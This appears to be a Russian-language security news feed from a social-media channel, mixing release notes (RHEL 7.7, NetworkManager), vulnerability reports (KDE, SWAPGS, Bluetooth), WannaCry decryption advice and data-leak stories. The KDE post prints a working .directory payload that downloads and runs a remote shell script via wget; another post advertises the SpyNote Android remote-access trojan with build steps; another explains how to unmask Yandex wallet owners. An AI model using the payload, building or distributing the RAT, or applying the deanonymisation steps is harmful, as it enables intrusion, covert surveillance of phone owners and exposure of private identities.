• Компхутерная БЕЗАПАСНАТЪ ! 3 months ago

    Выпуск Red Hat Enterprise Linux 7.7Компания Red Hat выпустила дистрибутив Red Hat Enterprise Linux 7.7. Установочные образы RHEL 7.7 доступны для загрузки только зарегистрированным пользователям Red Hat Customer Portal и подготовлены для архитектур x86_64, IBM POWER7+, POWER8 (big endian и little endian) и IBM System z. Исходные тексты пакетов можно загрузить из Git-репозитория проекта CentOS.
    Ветка RHEL 7.x сопровождается параллельно с веткой RHEL 8.x и будет поддерживаться до июня 2024 года. Выпуск RHEL 7.7 является последним в рамках основной полной стадии поддержки, подразумевающей включение функциональных улучшений. RHEL 7.8 перейдёт на стадию сопровождения, на которой приоритеты сместятся в сторону исправления ошибок и безопасности, с внесением незначительных улучшений, связанных с поддержкой важных аппаратных систем.
    Основные новшества:
    Предоставлена полноценная поддержка применения механизма Live-патчей (kpatch) для устранения уязвимостей в ядре Linux без перезапуска системы и без остановки работы. Ранее kpatch относился к числу экспериментальных возможностей;
    Добавлены пакеты python3 с интерпретатором Python 3.6. Ранее Python 3 поставлялся только в составе Red Hat Software Collections. По умолчанию по-прежнему предлагается Python 2.7 (переход на Python 3 осуществлён в RHEL 8);
    В оконный менеджер Mutter добавлены преднастройки экрана (/etc/xdg/monitors.xml) для всех пользователей в системе (больше не нужно отдельно настраивать параметры экрана для каждого пользователя;
    В графический инсталлятор добавлено определения включения в системе режима Simultaneous Multithreading (SMT) и вывод соответствующего предупреждения;
    Обеспечена полная поддержка Image Builder, построителя системных образов для облачных окружений, включая Amazon Web Services, Microsoft Azure и Google Cloud Platform;
    В SSSD (System Security Services Daemon) реализована полная поддержка хранения правил sudo в Active Directory;
    В системе сертификатов по умолчанию добавлена поддержка дополнительных наборов шифров, включая TLS_DHE_RSA_WITH_AES_256_GCM_SHA384, TLS_ECDHE_ECDSA_WITH_AES_256_CBC/GCM_SHA384, TLS_ECDHE_RSA_WITH_AES_128_CBC/GCM_SHA256, TLS_ECDHE_RSA_WITH_AES_256_CBC/GCM_SHA384 и TLS_RSA_WITH_AES_256_GCM_SHA384;
    Пакет samba обновлён до версии 4.9.1 (в прошлом выпуске поставлялась версия 4.8.3). Сервер директорий 389 обновлён до версии 1.3.9.1;
    Максимальное число узлов в отказоустойчивом кластере на базе RHEL увеличено с 16 до 32;
    Для всех архитектур обеспечена поддержка IMA (Integrity Measurement Architecture) для проверки целостности файлов и связанных с ними метаданных по базе предварительно сохранённых хэшей и EVM (extended verification module) для защиты расширенных атрибутов файлов (xattrs) от атак, направленных на нарушение их целостности (EVM не позволит совершить offline-атаку, при которой злоумышленник может изменить метаданные, например, загрузившись со своего накопителя);
    Добавлен легковесный инструментарий для управления изолированными контейнерами, использующий для сборки контейнеров Buildah, для запуска - Podman и для поиска готовых образов - Skopeo;
    Для новых установок для защиты от атак Spectre V2 по умолчанию теперь применяется механизм Retpoline ("spectre_v2=retpoline") вместо IBRS;
    Исходный код редакции ядра kernel-rt, работающего в режиме реального времени, синхронизирован с основным ядром;
    DNS-сервер bind обновлён до ветки 9.11, а ipset до выпуска 7.1. Добавлено правило rpz-drop для блокирования атак, использующих DNS в качестве усилителя трафика;
    В NetworkManager добавлена возможность задания правил маршрутизации по адресу источника (policy routing) и поддержка фильтрации VLAN на интерфейсах сетевых мостов;
    В SELinux добавлен новый тип boltd_t для демона boltd, управляющего устройствами с интерфейсом Thunderbolt 3. Добавлен новый класс правил bpf для инспектирования приложений на базе Berkeley Packet Filter (BPF);
    Обновлены версии shadow-utils 4.6, ghostscript 9.25, chrony 3.4, libssh2 1.8.0, tuned 2.11;
    В состав включена программа xorriso для создания и манипуляции образами ISO 9660 для CD/DVD;
    Добавлена поддержка расширений по контролю целостности данных (Data Integrity Extensions), которые позволяют защитить данные от их повреждения при записи в хранилище за счёт сохранения дополнительных корректирующих блоков;
    В утилиту virt-v2v добавлена поддержка преобразования для запуска под управлением KVM виртуальных машин с SUSE Linux Enterprise Server (SLES) и SUSE Linux Enterprise Desktop (SLED), используемых с гипервизорами, отличными от KVM. Увеличена производительность и надёжность преобразования виртуальных машин VMWare. Добавлена поддержка преобразования виртуальных машин, использующих прошивки UEFI, для запуска в Red Hat Virtualization (RHV);
    Пакет gcc-libraries обновлен до версии 8.3.1. Добавлен пакет compat-sap-c++-8 с вариантом runtime-библиотеки libstdc++, совместимой с приложениями SAP;
    В состав включена БД Geolite2, в дополнение к устаревшей БД Geolite, предлагаемой в пакете GeoIP;
    Инструментарий трассировки SystemTap обновлён до ветки 4.0, а инструментарий для отладки работы с памятью Valgrind до версии 3.14;
    Редактор vim обновлён до версии 7.4.629;
    До версии 1.0.35 обновлён набор фильтров для системы печати cups-filters. Фоновый процесс cups-browsed обновлён до версии 1.13.4. Добавлен новый бэкенд implicitclass;
    Добавлены новые сетевые и графические драйверы. Обновлены существующие драйверы;

  • Компхутерная БЕЗАПАСНАТЪ ! 3 months ago

    Релиз сетевого конфигуратора NetworkManager 1.20.0
    Опубликован новый стабильный релиз интерфейса для упрощения настройки параметров сети - NetworkManager 1.20. Плагины для поддержки VPN, OpenConnect, PPTP, OpenVPN и OpenSWAN развиваются в рамках собственных циклов разработки.
    Основные новшества NetworkManager 1.20:
    Добавлена поддержка беспроводных Mesh-сетей, каждый узел в которых связан через соседние узлы;
    Проведена чистка от устаревших компонентов. В том числе удалена библиотека libnm-glib, на смену которой в NetworkManager 1.0 пришла библиотека libnm, удалён плагин ibft (для передачи данных о сетевой конфигурации от прошивки следует использовать nm-initrd-generator из initrd) и прекращена поддержка настройки "main.monitor-connection-files" в NetworkManager.conf (следует явно вызывать "nmcli connection load" или "nmcli connection reload");
    По умолчанию активирован встроенный DHCP-клиент (режим "internal") вместо ранее используемого приложения dhclient. Изменить значение по умолчанию можно при помощи сборочной опции "--with-config-dhcp-default" или через настройку main.dhcp в файле конфигурации;
    Добавлена возможность настройки дисциплины управления очередями ожидающих отправки пакетов fq_codel (Fair Queuing Controlled Delay) и действия mirred для зеркалирования трафика;
    Для дистрибутивов предоставлена возможность размещения скриптов диспетчеризации в каталоге /usr/lib/NetworkManager, что можно использовать в системных образах, доступных в режиме только для чтения и очищающих /etc при каждом запуске;
    В плагин keyfile добавлена поддержка каталогов в режиме только для чтения ("/usr/lib/NetworkManager/system-connections"), профили в которых могут быть изменены или удалены через D-Bus (в этом случае недоступные для изменения файлы в /usr/lib/ переопределяются файлами, сохраняемыми в /etc или /run);
    В libnm переработан код разбора настроек в формате JSON и обеспечена более строгая проверка параметров;
    В правилах маршрутизации по адресу источника (policy routing) добавлена поддержка атрибута "suppress_prefixlength";
    Для VPN WireGuard реализована поддержка скриптов для автоматического назначения маршрута по умолчанию "wireguard.ip4-auto-default-route" и "wireguard.ip6-auto-default-route";
    Переработана реализация плагинов управления настройками и метода хранения профилей на диске. Добавлена поддержка миграции профилей соединений между плагинами;
    Хранимые в памяти профили теперь обрабатываются только плагином keyfile и сохраняются в каталоге /run, что позволяет избежать потери профилей после перезапуска NetworkManager и даёт возможность использовать API на основе ФС для создания профилей в памяти;
    Добавлен новый D-Bus метод AddConnection2(), позволяющий заблокировать автоподключение профиля в момент его создания. В метод Update2() добавлен флаг "no-reapply", при котором изменение содержимого профиля соединения не приводит к автоматическому изменению фактической конфигурации устройства до момента реактивации профиля;
    Добавлена настройка "ipv6.method=disabled", позволяющая отключить IPv6 для устройства.

  • Компхутерная БЕЗАПАСНАТЪ ! 3 months ago

    Уязвимость в KDE, позволяющая выполнить код при просмотре списка файлов
    В KDE выявлена уязвимость, позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ. Проблема проявляется в актуальном выпуске библиотек KDE Frameworks 5.60.0 и более старых версиях, вплоть до KDE 4. Уязвимость пока остаётся неисправленной (CVE не присвоен).
    Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функию KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды. Вопреки требованиям спецификации XDG выполнение раскрытия shell-конструкций производится без разделения типа настроек, т.е. не только при определении командной строки запускаемого приложения, но и при указании отображаемых по умолчанию пиктограмм.
    Например, для атаки достаточно отправить пользователю zip-архив с каталогом, содержащим файл ".directory" вида:
    [Desktop Entry]
    Type=Directory
    Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
    При попытке просмотра содержимого архива в файловом менеджере Dolphin будет загружен и выполнен скрипт https://example.com/FILENAME.sh.

  • Компхутерная БЕЗАПАСНАТЪ ! 3 months ago

    SWAPGS - новая уязвимость в механизме спекулятивного выполнения CPU
    Исследователи из компании Bitdefender выявили новую уязвимость (CVE-2019-1125) в механизме спекулятивного выполнения инструкций современных CPU, которая получила имя SWAPGS, соответствующее названию процессорной инструкции, вызывающей проблему. Уязвимость позволяет непривилегированному атакующему определить содержимое областей памяти ядра или запущенных виртуальных машин. Проблема подтверждена в процессорах Intel (x86_64) и частично затрагивает процессоры AMD, для которых не проявляется основной вектор атаки. Ранее реализованные методы противодействия уязвимостям Spectre и Meltdown не защищают от атаки SWAPGS при использовании процессоров Intel, но для Linux, ChromeOS, Android и Windows уже предложены исправления.
    Уязвимость относится к классу Spectre v1 и основывается на идее восстановления данных из процессорного кэша, оставшихся после спекулятивного выполнения инструкций. Блоки предсказания переходов современных CPU для повышения производительности применяют упреждающее выполнение некоторых инструкций, которые вероятнее всего будут выполнены, но не дожидаясь вычисления всех факторов, определяющих их выполнение (например, когда ещё не вычислены условия перехода или параметры доступа). Если прогноз не подтверждается, процессор отбрасывает результат спекулятивного выполнения, но обработанные в его ходе данные оседают в процессорном кэше и могут быть восстановлены при помощи методов определения содержимого кэша по сторонним каналам, анализирующих изменение времени доступа к прокэшированным и не прокэшированным данным.
    Особенность новой атаки в использовании утечки, возникающей в ходе спекулятивного выполнения инструкции SWAPGS, которая применяется в операционных системах для замены значения регистра GS при переходе управления из пространства пользователя в ядро ОС (используемое в пространстве пользователя значение GS заменяется на значение, используемое при операциях в ядре). В ядре Linux в GS хранится указатель per_cpu, используемый для доступа к данным ядра, а в пространстве пользователя указатели на TLS (Thread Local Storage).
    Для исключения двойного вызова инструкции SWAPGS при повторном обращении к ядру из пространства ядра или когда выполняется код, не требующий замены регистра GS, перед инструкцией осуществляется проверка и условный переход. Механизм спекулятивного выполнения заранее переходит к выполнению кода с инструкцией SWAPGS, не дожидаясь результата проверки, и если выбранная ветка не подтвердилась, отбрасывает результат. Таким образом, может возникнуть ситуация, когда спекулятивно будет выбрана ветка не предусматривающая выполнение SWAPGS, но в процессе спекулятивного выполнения значение регистра GS будет изменено инструкцией SWAPGS и использовано в зависимых операциях с памятью, которые оседают в кэше CPU.
    Исследователями предложено два сценария атаки, для которых подготовлены прототипы эксплоитов. Первый сценарий основывается на ситуации, когда инструкция SWAPGS не выполняется спекулятивно, хотя используется при фактическом выполнении, а второй - наоборот, когда инструкция SWAPGS выполняется спекулятивно, хотя фактически не должна. Для каждого сценария предусмотрено два варианта эксплуатации: атакующий может определить значение по определённому адресу в области ядра и атакующий может выполнить поиск определённого значения в по случайным адресам в ядре. Проведение атаки занимает много времени и для организации утечки может потребоваться выполнение эксплоита в течение нескольких часов.
    В ядре Linux проблема устранена через изменение логики вызова инструкции SWAPGS (блокирование спекулятивного выполнения), по аналогии с исправлением других уязвимостей класса Spectre v1. Предполагается, что добавленная защита минимально повлияет на производительность типовых рабочих нагрузок. Задержка возникает на этапе переключения между пространством пользователя и ядра, что может привести к снижению производительности, например, при интенсивном выполнении системных вызовов из приложения или частой генерации NMI и прерываний.
    Исправление требует установки обновления ядра как в основной системе, так и в гостевых окружениях, с последующей перезагрузкой системы. Для отключения защиты в Linux может быть использована опция "nospectre_v1", которая также отключает меры для блокирования уязвимости SWAPGS. Исправление доступно в виде патча для ядра Linux, который уже включён в состав выпусков 4.19.65, 5.2.7, 4.14.137, 4.9.188 и 4.4.188. Обновления для дистрибутивов Linux пока не выпущены (Debian, RHEL, Fedora, Arch Linux, SUSE/openSUSE, Ubuntu). В Windows проблема без лишней огласки была устранена в июльском обновлении. Компания Google подготовила исправление для ядра 4.19, поставляемого в ChromeOS и Android.
    По заявлению исследователей из компании Bitdefender, Intel был информирован о проблеме ещё в августе прошлого года. Проблему было решено устранить программно, для чего к скоординированной выработке исправления были привлечены разработчики из Microsoft, Google и ядра Linux. Старые процессоры Intel, до Ivy Bridge, атаковать значительно труднее из-за отсутствия поддержки инструкции WRGSBASE, использованной в эксплоите. Системы ARM, POWER, SPARC, MIPS и RISC-V не подвержены проблеме, так как не поддерживают инструкцию SWAPGS.
    Проблема угрожает главным образом обладателям процессоров Intel - на системах AMD удалось воспроизвести только второй сценарий атаки, ограничивающийся спекулятивной обработкой базового значения регистра GS, что можно использовать для поиска определённых значений в случайных областях памяти. Для блокирования данного варианта атаки достаточно существующих методов защиты от уязвимостей Spectre v1.

  • Компхутерная БЕЗАПАСНАТЪ ! 3 months ago

    Немного скринов как вк сливает пользователей ! Максимальный репост !
    Пост 6

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 3 months ago

    Немного скринов как вк сливает пользователей ! Максимальный репост !
    Пост 5

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 3 months ago

    Немного скринов как вк сливает пользователей !
    Пост 4

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 3 months ago

    Немного скринов как вк сливает пользователей ! Максимальный репост !
    Пост 2

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 3 months ago

    Немного скринов как вк сливает пользователей ! Максимальный репост !
    Пост 1

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5 months ago

    А ну верни на место!
    Читал тут как-то пост о странных клиентах и вспомнил, что и мне однажды не повезло:
    Есть у меня хобби: иногда беру в "ремонт" у знакомых компы и буки - у кого-то не включается, у кого-то тупит, кто-то тупо просит новую винду, типа, старая надоела )))) и т.п.
    Вот и в тот раз, одна знакомая предложила:
    - У меня есть старый ноутбук у него экран не включается нужно починить и очень старый комп. Что с ним - я не помню, дети уже новый купили, но ты посмотри его, может с ним что-то можно сделать.
    Я сопротивляться не стал. Посмотрел - ноут роняли и матрица экрана накрылась. Остальное в порядке.
    С компом интереснее: открыл крышку внутри провода для передних юсб и аудио перепутаны в комок, и даже кажется, что есть лишние. Проверять не стал.
    В остальном, видеокарта с аудиокартой интегрированы, и из материнки только "торчит" кулер процессора и две планки оперативки. Ну и, конечно, винчестер и DVD-привод. Поковырял я его: не работает материнка, как следствие - ремонтировать бессмысленно. Устарел полностью, если что и найдётся - то только на барахолке.
    В общем, так ей и объяснил: матрица на ноут стоит столько-то, и то заказывать такую можно только почтой, а это стрёмно. А комп, лучше продать по частям, может кому оперативка, проц или винт с приводом понадобятся.
    Она повздыхала, поблагодарила, денег с неё не взял - не за что.
    А через день подходит она ко мне на работе:
    - Скажи, а почему ты мне в компьютер не все платы поставил и проводов набросал?
    Я подвис, перебираю в памяти, какие такие “платы“:
    - А каких не хватает? Там две длинные низенькие стоят? Я их должен был поставить, больше, просто, нечего. Буду дома - посмотрю, но забыть я ничего не мог.
    - А там ещё есть места где плат не хватает: снизу под вентилятором из три в ряд и ещё маленькие есть... А провода зачем мотком?
    - Это спереди проводами входы подключены. Я их разматывать не стал. А в разъёмы на материнке вставляются разные дополнительные штуковины типа видео-аудио-сетевых карт, много разного... Но в этом случае зачем? У него всё встроенное.
    - Нет, там должно ещё быть что-то.
    - Что? Что там может ещё быть?
    - Я не знаю! Но должно быть больше!
    Я начинаю потихоньку закипать:
    - Да зачем мне вообще что-то настолько старое? Мне репутация дороже, я ещё буду компами заниматься и антиреклама мне ни к чему!
    - Ну а куда оно всё делось? Ты меня дурой считаешь???
    - Нет не дурой, ну может чуть-чуть знаний не хватает чтобы в теме разбираться, вот и решила что там много всего должно быть.
    В ответ она что-то сказала (что - память умалчивает), надулась и ушла.
    С тех пор так и ходит демонстративно отворачиваясь.
    Один из наших общих знакомых мне потом рассказывал, что как-то он с ней затронул тему о компах. А она и сказала: у меня ничего нет: одному дала - всё с компьютера повынимал, другой всё с ноутбука. Ничего не работает!
    А вроде казалась вполне адекватной женщиной...

  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    Правила безопасности в Asterios Nertwork
    Этот пост я пишу для тех, кто хочет остаться анонимным!
    И так, начнем!
    Вы занимаетесь чем то не очень хорошим, или желаете скрыть свою личность?
    Тогда вам поможет эта статья, сегодня я @Vhack помогу вам остаться анонимным username
    Перед началом пару слов о том как можно вычислить человека))
    - Аватарка , многие ставят одни и те же авы что и в других соц сетях
    - Емайл , на сколько бы не была астериос анонимны / я использую мыло от временной почты / темп-мейл подойдет
    - Имя/ Логин - многие долбаебы ставят один и тот же логин и имя /ник
    - Граматическые ошибки , совершаю, специально, много: грам ошибок, меня сложнее
    вычеслить
    пппроехали теперь туториал Гайд от @vhack
    Регистрируемся на временную почту, если вашу основную почту взломают, они на изи смогут доказать что это вы , астероис хорошЪ тем / что он не обязывает подтверждать почту, поэтому я могу зарегаться на выдуманную почту и которая обезопасит меня от взлома/ главное помнить пароль от своего аккаунта
    А теперь самое интересное
    Зачем это все ???????
    ответ изи прост- пока ты анонимен/ ты можешь на изи постить / все что угодно
    И да / для тех кто пиздит про телеграмм/ идите нахуй/ просто идите нахуй/
    убейтесь по пути/ какого ебаного черта я должен указывать свой телефон в телеге?
    Дуров соси хуй!!! он сливает все о вас/ а если не он то / операторы связи на изи могут перехватить смс и войти ваш акаунта и прочитать всю переписку!
    Дуров просто пидорас , и обманщик, который пиздит про анонимность, в астериос установлен клод, который уже изначально не передает мой реальный ип, а если верить админам, то у них кроме Клода еще хуева куча прокси серверов/
    Мой ип уже в безопасности, а в телеге не ип ты скинь/ да и что
    мы можем наблюдать это в ролике стасяна , привет тебе от ильюхи


    минуты 5:24
    ня пока

  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    WannaCry - расшифровка файлов
    Вирус - вымогатель WannaCry атаковал 12 мая, в пятницу более 75000 компьютеров по всему миру. В основном пострадали крупные компании, организации, транспортные компании, медицинские и учебные учреждения, даже МВД РФ WannaCry не обошёл стороной. На данный момент пострадало уже более 300000 компьютеров более чем в 100 странах. WanaCrypt0r 2.0, или как его ещё называют "WannaCry", распространяется путём почтовых вложений. Оказавшись в системе вирус сканирует диски и сетевые папки на наличие файлов с определёнными расширениями (более 160) и шифрует их добавляя расширение .WNCRY. Затем подключаются функции червя - само распространение, WannaCry сканирует доступные ip адреса на 445 порт и распространяется по локальной сети. Удаляется данный шифратор как и прочие шифраторы - винлоки, входом в систему через "безопасный режим", очисткой автозагрузки и реестра, физическим удалением файлов вируса, удалением лишних записей из файла C:\Windows\System32\drivers\etc\hosts. НО, в случае если вы увидели на своём мониторе характерное окошко WannaCry, требующее вас отправить 300$ на биткоин кошелёк, ни в коем случае не торопитесь выключать или перезагружать компьютер, есть шанс расшифровать файлы!
    WannaCry - расшифровка файлов
    Wanakiwi - утилита в большинстве случаев поможет расшифровать зашифрованные вирусом WannaCry файлы, но только в том случае если после заражения компьютер не отключался и процесс, генерировавший ключ всё ещё запущен. Учитывая тот факт, что этот метод основан на сканировании адресного пространства процесса, который сгенерировал эти ключи, это означает, что если этот процесс был убит, например, путем перезагрузки - исходная память процесса будет потеряна. Очень важно, чтобы пользователи НЕ перезагрузили свою систему перед тем, как прибегнуть к помощи Wanakiwi.
    Скачать: wanakiwi.zip [363,95 Kb] (cкачиваний: 653)
    При запуске Wanakiwi автоматически ищет процессы, такие как:
    - wnry.exe
    - wcry.exe
    - data_1.exe
    - ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c...
    - tasksche.exe
    Но если в вашем случае название процесса отличается от стандартных то Wanakiwi можно запустить через консоль cmd с параметрами pid или process, чётко указав программе с каким процессом работать:
    wanakiwi.exe [/pid:PID|/process:program.exe]
    В процессе работы wanakiwi будет расшифровывать файлы создавая их как новые, не затрагивая шифрованные файлы с расширением .WNCRY.
    WannaCry - расшифровка файлов
    После того как файлы будут расшифрованы рекомендуется важные файлы скопировать на внешний носитель или облачное хранилище, затем выполнить перезагрузку системы в "безопасном режиме" и удалить файлы вируса и следы его присутствия. После чего выполнить обновление операционной системы. Microsoft выпустила обновления для всех уязвимых систем, в том числе и для уже не поддерживаемой windows XP.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    SpyNote v2 (RAT для Android'а)
    Возможности:
    Не требует Root прав
    Скачивание файлов с девайса
    Просмотр sms'ок
    Прослушка девайса
    Просмотр контактов
    Просмотр локации
    Терминал
    Билдер
    Инструкция к использованию:
    1. Запускаем SpyNote.exe
    2. Вписиваем порт. У меня 1604
    3. Тыкаем ОК
    4. После того как вылезло окошко тыкаем на Tools-->Build
    5. Вводим все что надо. Думаю здесь обяснять не надо
    5. Нажмаем на Build в левом верхнем углу (Build-->Build >)
    Видео:


    Cсылка будет в коментах

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    Яндекс раскрывает персональные данные своих пользователей
    Яндекс вводит новую функцию в сервис Яндекс.Деньги. Нововведение нигде не афишируется, а пользователи натыкаются на него случайно.
    Что же сделал Яндекс?
    Теперь при переводе денег отображается поле «Получатель». ФИО берется из паспорта пользователя, указанного при идентификации кошелька. Без идентификации нельзя пользоваться сервисом Яндекс.Деньги, поэтому он будет указан у 95% владельцев кошельков.
    Яндекс раскрывает персональные данные своих пользователей
    А теперь почитаем FAQ сервиса. Нам говорится, что данные хранятся в секрете и никому не передаются. На деле любой пользователь может «раздеанонить» владельца кошелька всего лишь имея 0.01 рублей на балансе. Поэтому теперь владельцы небольших компаний, принимающих платежи на именной кошелек раскрывают свои данные.
    Яндекс раскрывает персональные данные своих пользователей
    А сейчас перейдем к практике.
    Нам понадобится примерно рубль на кошельке.
    Переходим на страницу «Перевод денег» — https://money.yandex.ru/transfer
    Далее будет поле «Кошелек, телефон или почта» — Да, можно узнать имя и отчество по телефону, почте и номеру кошелька!
    Яндекс раскрывает персональные данные своих пользователей
    Ставим сумму перевода 0.01 и нажимаем «Продолжить»
    Откроется нужное нам окно с раскрытием персональных данных.
    Яндекс раскрывает персональные данные своих пользователей, а также других сервисов. Если вы беспокоитесь о безопасности своих персональных данных, то Вам не к Яндексу.
    Прости, Илья Сегалович, мы все прое*али.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    Лондонская галерея принимает криптовалюту
    Одна из самых посещаемых галерей Лондона – The House of Fine Art теперь предоставляет своим клиентам возможность приобрести произведения искусства за цифровую валюту
    Одна из самых посещаемых галерей Лондона, The House of Fine Art, расположенная в Мейфэре – центральном районе города, теперь предоставляет своим клиентам возможность приобрести произведения искусства за цифровую валюту.
    Таким образом, The House of Fine Art претендует на звание первой галереи, посетители которой смогут купить любую понравившуюся картину из коллекции, перечислив несколько токенов, а иногда и сотен токенов со своего криптовалютного кошелька.
    Соучредитель галереи Элио Д’Ана отметил, что клиенты уже не раз выявляли желание приобрести то или иное произведение искусства за биткоины, а потому нельзя было упускать такую возможность. Тем более, что с каждым днем криптовалюты становятся все более распространенным явлением во всех сферах жизни обычного потребителя.
    Руководство галереи убеждено, что уже в обозримом будущем произойдет усовершенствование системы купли-продажи работ, если большинство галерей последуют их примеру.
    Что касается стоимости объектов, то она самая разная – от 4 000 до 250 000 фунтов. Причем это могут быть не только картины, но и скульптуры за авторством итальянца Стефано Бомбардиери или французского скульптора Ричарда Орлински.
    Процесс продажи произведений стал доступен благодаря сотрудничеству с крипто-платформой Uphold. Вся коллекция галереи вскоре будет перемещена в другую локацию, где и произойдет продажа за криптовалюту в октябре этого года.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    Исследование: популярность криптовалюты в Сети влияет на ее курс
    Аналитики Йельского университета провели исследование, в результате которого выявили прямую зависимость цены биткоина от внимания пользователей в сети Интернет.
    Аналитики Йельского университета провели исследование, в результате которого выявили прямую зависимость цены биткоина от внимания пользователей в сети Интернет.
    Так, в Национальном бюро экономических исследований США утверждают, что рост числа запросов в Google со словом «биткоин» сменяется ростом курса монеты (примерно на 3%) через несколько недель.
    Социальные сети также влияют на стоимость криптовалюты, например, за ростом количества сообщений в тематике биткоина в Twitter следует повышение в среднем на 2,5%.
    А вот новости о взломах и атаках на криптобиржи, наоборот, «тянут» криптовалюту «на дно».
    В результате исследований, ученые пришли к единогласному выводу: реакция цифровых валют на обстановку на рынках кардинально отличается от реакции фиатных средств на те же факторы, поэтому применять к криптовалютам традиционные методы анализа и расчета неприемлемо. Исследователи выявили факторы, которые действительно оказывают влияние на криптоиндустрию и курсы цифровых активов.
    «Эффект импульса». Если курс криптовалюты растет, то стоит ожидать дальнейшего восходящего тренда. Так, по мнению ученых, биткоин следует покупать, когда его цена вырастает не мнее, чем на 20% в сравнении с предшествующей неделей.
    Внимание со стороны инвесторов. Курс криптовалюты зависим от числа упоминаний о ней в Интернете. Когда внимание к определенной монете повышается, то и стоимость ее начинает пропорциональное движение вверх. Так, биткоин начинает расти в через 1-2 недели после повышения интереса к нему в Сети, эфириум – через неделю, а Ripple – через 1-6 недель.
    Кроме того, ученые пришли к выводу, что инвесторы должны уделить биткоину 6% от своего инвестиционного портфеля.

  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    Booking.com передаёт приватные данные карт клиентов третьим лицам
    Пользователь Pikabu рассказал свою историю,где был замешан booking.com:
    «Все началось с моей поездки в Куала-Лумпур ( Малайзия ) 21го Июля 2018. Как обычно, по приезду, я начал искать место где можно остановиться. Для этого, я воспользовался небезызвестным сервисом Booking.com. Я довольно часто им пользуюсь, и обычно у меня не возникало никаких проблем. Стандартная процедура, выбрал отель, заполнил даты пребывания, подтвердил бронирование и отправился туда.
    Но как же Я был удивлен и возмущен, когда на респешене отеля, у администратора в руках, оказалась распечатанная бумажка с данными моей карты, включая : Тип карты, Имя и Фамилия на карте, Срок действия карты и CVV код! Данные все совпадают и их я вводил только на сайте Booking.com!
    Обратите внимание, под Reservation ID, мелким шрифтом написано: "You can view your guests credit card details 3 times" - " Вы можете просмотреть детали кредитной карты вашего гостя 3 раза ". Вероятно Booking.com дает возможность только три раза просмотреть эти данные, но как видите - этого хватило!
    Самое прикольное, что используя эти данные, администратор отеля списал деньги с карты для оплаты бронирования! Я даже не вводил пинкод!
    Получается букинг сливает секретные данные карт всем кому ни попадя и с помощью этих данных можно проводить операции без спроса владельца карты!
    Очень разочарован в Booking.com, карту был вынужден заблокировать.»

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    В Bluetooth обнаружена серьезная уязвимость, Apple уже выпустили заплатку
    23 июля 2018 года инженеры компании Intel сообщили об уязвимости Bluetooth, позволяющей хакерам перехватывать трафик, сообщения и другие данные с устройств Apple. Сотрудники корпорации уже исправили эту проблему.
    Ошибка шифрования касается подключения по Bluetooth и Bluetooth LE и затрагивает модули таких крупнейших поставщиков оборудования, как Apple, Broadcom, Intel, Qualcomm и, возможно, других игроков отрасли.
    Уязвимость возникает из-за того, что устройства недостаточно тщательно проверяют параметры шифрования и генерации открытых ключей доступа, происходящих в соотвествии с протоколом Диффи-Хеллмана, при защищенных Bluetooth-соединениях. Это позволяет злоумышленнику, находящемуся в радиусе 30 метров от спаренных гаджетов, получить несанкционированный доступ через соседнюю сеть, перехватывать трафик и отправлять фальшивые сообщения между уязвимыми устройствами. Что, в свою очередь, может привести к утечке конфиденциальных данных.
    Сотрудники Bluetooth Special Interest Group считают, что с подобной проблемой могло столкнуться весьма ограниченное число пользователей. Поскольку для успешной атаки хакеру необходимо находиться неподалеку от устройства жертвы, дождаться, когда оно образует Bluetooth-пару с другим гаджетом, а затем перехватить обмен ключами, заблокировать подтверждения и отправить вредноносный пакет данных в целевой девайс за короткий промежуток времени.
    Тем не менее, Apple уже выпустила исправления для всех своих устройств. Пользователям, своевременно устанавливающим обновления ПО, нечего опасаться.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 18 months ago

    Находим вирус,маскирующийся под svchost
    Как правило, большинство троянских и шпионских программ стараются скрыть своё присутствие на компьютере для чего прибегают к различного рода хитростям, например, тщательно прячут свои процессы либо маскируются под процессы системные. Потенциальной «жертвой» вируса может стать любой системный процесс, но чаще всего вредоносные программы прикрываются маской процесса svchost.
    И на это у них есть свои причины. Дело в том, что svchost запускается в нескольких экземплярах внешне практически ничем неотличимых друг от друга, так что если в Диспетчере задач появится ещё один процесс svchost, а их число может достигать нескольких десятков, особого подозрения со стороны пользователя это не вызовет. Но если они одинаковы, как определить, какой из них является настоящим, а какой волком в овечьей шкуре?
    Оказывается, что не так уже и сложно, но перед тем как приступать к их идентификации, позвольте пару слов о самом процессе svchost. Как видно из его полного названия Generic Host Process for Win32 Services, отвечает он за работу служб и сервисов, причём как системных, так и сторонних, использующих динамические библиотеки DLL, которые в свою очередь составляют немалую часть файлов Windows и прикладных программ.
    Этот процесс настолько важен, что если файл svchost.exe будет повреждён, Windows не сможет нормально работать. В работающей системе присутствует как минимум четыре экземпляра процесса svchost, но их может быть и значительно больше. Необходимость такого дублирования объясняется количеством обслуживаемых процессом служб и сервисов, а также необходимостью обеспечения стабильности системы.
    Итак, как же узнать, является ли svchost настоящим? Первым критерием подлинности файла svchost.exe является его месторасположение. Его законным местом обитания являются следующие папки:
    • C:/WINDOWS/system32
    • C:/Windows/SysWOW64
    • C:/WINDOWSPrefetch
    • C:WINDOWS/ServicePackFiles/i386
    • С:/WINDOWS/winsxs/*
